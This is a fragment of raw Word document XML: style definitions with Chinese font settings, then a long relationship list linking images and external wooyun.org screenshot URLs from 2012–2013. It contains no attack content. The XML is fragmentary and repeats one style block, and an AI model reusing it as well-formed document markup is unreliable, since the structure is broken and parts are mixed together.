    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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907EC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16EE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6EE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E7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7BF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7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7BF2"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00D62588"/>
    <w:rPr>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009A6E70"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体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7A2497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59"/>
    <w:rsid w:val="009C7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E70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EC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907EC1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07EC1"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="宋体" w:hint="default"/>
      <w:color w:val="333333"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00907EC1"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="3" w:color="CCCCCC"/>
        <w:left w:val="single" w:sz="6" w:space="6" w:color="CCCCCC"/>
        <w:bottom w:val="single" w:sz="6" w:space="3" w:color="CCCCCC"/>
        <w:right w:val="single" w:sz="6" w:space="6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jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="宋体"/>
      <w:color w:val="333333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907EC1"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="宋体"/>
      <w:color w:val="333333"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="detail1">
    <w:name w:val="detail1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00907EC1"/>
    <w:pPr>
      <w:widowControl/>
      <w:wordWrap w:val="0"/>
      <w:spacing w:line="375" w:lineRule="atLeast"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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907EC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16EE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6EE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E7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7BF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7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7BF2"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00D62588"/>
    <w:rPr>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009A6E70"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体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7A2497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59"/>
    <w:rsid w:val="009C7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843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531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514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2076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7658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03948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9833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946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96488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65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6956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5160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83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63414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0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jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/131722122587ad10a76b4e44d6cf60465e2f560f.jpg" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/1422023352658760151b3745d0e44be6fd6afd4c.jpg" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/18221424fff6960e14ca54913e611df4a4af2f98.jpg" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/25233240ba209f911764c1d9270a3cd4e9f9775f.jpg" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.jpeg"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/27173127819d8d6bcda8123b92e438107083663a.jpg" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpeg"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/142120151caa63f2e9bfc24b2db1ec83485eeb59.jpg" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/31225022debe4fea99acbc654a1bb7f2de5b5c73.png" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.jpeg"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/2717301488c0aa1ab6d3b36f7f0f4e07fe523299.jpg" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpeg"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201301/011958551b8920fe0dd49137cdf34e2a1c90408c.jpg" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/131935081b49f955e15c9c4cf9b386052c44efec.jpg" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/14124519564de442c1c675d2b38e381bdc4b83b5.jpg" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/17201946436bf2563ba4a05f16f7f30719f60500.jpg" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.jpeg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/24154654b9a20e845b0f8c048d38d9db2d037368.jpg" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/25233218976ed0160889307b39749a85f29115ad.jpg" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.jpeg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/1720213115bf95205f14f53caf05ec8b5f730021.jpg" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/26125057bf924dad55bd2f36a02426d6d1ae9f5c.jpg" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.jpeg"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.jpeg"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/29175630afe35f01e531c0e75290f3a8c5fcaf2a.jpg" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/311805441a02eaa1a41b02f8c3c2829b3231bf95.jpg" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201301/0103190902230dbc969bd936ff1809ae8bf902f9.jpg" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpeg"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201301/0119592592822ea40ad4d15cbf26cccb35ec209a.jpg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33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/132044290631ee315a2a34d1244d46dd676229ce.jpg" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/142146481234d69392741334b10fead53a33de61.jpg" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.jpeg"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/20151938087a62d88444137933a09ec58b7538b0.jpg" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/24154735abefc2dd5468702e7695dd796409e2fd.jpg" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.jpeg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/1720202809de4d829213f3937ed9287a74cd4122.jpg" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpeg"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/182215394c02941d424ef60dc455dedddc950614.jpg" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/2523324949a4f13d5b89947e128011ff1eba52e4.jpg" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.jpeg"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.jpeg"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/27173101695d748ad1f53009e846b793a70fc938.jpg" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/2919473918e3ffe552063de159d974e45bda9f69.jpg" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpeg"/><Relationship Id="rId217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wooyun.org/upload/201301/01032001e5f8adbb70864f7cc221444d44840ff2.jpg" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/13172223d8944321f074c59c0d4e52b17f6a0b6a.jpg" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/141257324a7d4081ef5ffbabc78c42622e394374.jpg" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/2015254909581c9583b46bd6461f5734b2e62886.jpg" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpeg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/1720190930340233677b7b88837f4c82b2636ccf.jpg" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/1822143764592e6d3f35e5539b3eef130b191622.jpg" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/2523315098e76b7506e0d32413fcd275f86fa893.jpg" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.jpeg"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.jpeg"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/26125141b7d603d09ac33670457c902dc293898d.jpg" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.jpeg"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/311806005dbde6f668fb293e7197f6359127273d.jpg" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/271731372d5aa18ea65636c4f6fdfddf16f00eac.jpg" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpeg"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/31180616e5ec89e0ce1a05b8fdd683ae5a234103.jpg" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113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hyperlink" Target="http://www.wooyun.org/upload/201212/141110460d918be01544dd1f1be7d3b21a495b2c.jpg" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/1421260800043bdd759aca14993882b1b595af9a.jpg" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpeg"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/19154511c94c96e795ccb1e17904ae4e54effdb5.jpg" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/241547060f6f133b604053830d72cca9c8184680.jpg" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.jpeg"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.jpeg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/26125003260b60b77a06157b591dd59f0983802c.jpg" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.jpeg"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/291948357c9e1f3273171fe18eea631c0d770ca5.jp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wooyun.org/upload/201212/172019576654e538c23769731980ce7a1c081ffd.jpg" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/18221518493a224f78bfa8d29589c5c88ba66aec.jpg" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/27173022d7877e44a52da8be74c4671836d2ee8b.jpg" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.jpeg"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpeg"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201301/01195903747f9c96a79dbf617e38ccb846e61257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ooyun.org/upload/201212/1319354861f6e9fcec95b51f91233a04d3e47056.jpg" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/141251214cfa7d0d678d107ec4ffd8284067c6db.jpg" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpeg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/20152247dad7bd96c563a6fe20db4d501c5ab192.jpg" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.jpeg"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.jpeg"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/25233230972ea04bb613c3230632e6f8bb2ef9f8.jpg" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.jpeg"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/29175638062be5196a23b4d7f2e9de411981565d.jpg" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/142157583ebeea10923c9aaa6bfdd43fb6141c04.jpg" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/17202205cf9ab9768b4ae01d53d69876e928e5e1.jpg" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/2612511079a8b1b336bdc14d335920ddba3361e9.jpg" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.jpeg"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/3118055137b5a57316ce9036d1db49ce33e7af77.jpg" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.jpeg"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201301/010319380cf8dda3f73501e859b72abcf0fda075.jpg" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/14110520b5c177419b984f01d7a41196f31cd4d4.jpg" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/17202106b2c180af9a2360c1d611fad012cdd81e.jpg" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/19154430ae2d748a5cf3dc621ba75b524a78024b.jpg" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpeg"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/31224929a179a4d602eab7225f277b207e9ed267.png" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.jpeg"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/27173113c12953e0d7f9e58fa1ffb64deaae667a.jp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wooyun.org/upload/201212/1413015032a6e155c574bfaee8d68dc2725908e8.jpg" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpeg"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/191544208b2fde268678badb84f04b190fc83a4b.jpg" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.jpeg"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/252333004f2d21cfc1e3270d0ce495c2296da875.jpg" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.jpeg"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/29194807212cba0ae56ebb82ae31cc674312812e.jpg" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpeg"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201301/011958439fdb2c8bc30c5efae99078785f7b273c.jpg" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/1317111974419ea4c5a88b5470b8c7b029c18182.jpg" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/1720192454afdbeb61a52010be31a9dae98a6c36.jpg" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/20152610ec7b00937a8a616b561837cd6ac4e07a.jpg" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.jpeg"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/27173004189d5c09cba0081adc34a833519c5906.jpg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://www.wooyun.org/upload/201212/14111442c5935ea172278963dec6e68cfad21303.jpg" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/182214527a199679827e79f7d3923726169c805c.jpg" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.jpeg"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/252332025da2e93afb09068f4fdbeda374c93a2a.jpg" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.jpeg"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/271731462d4c75dd0dee4b9e64c0e818c272cc64.jpg" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.jpeg"/><Relationship 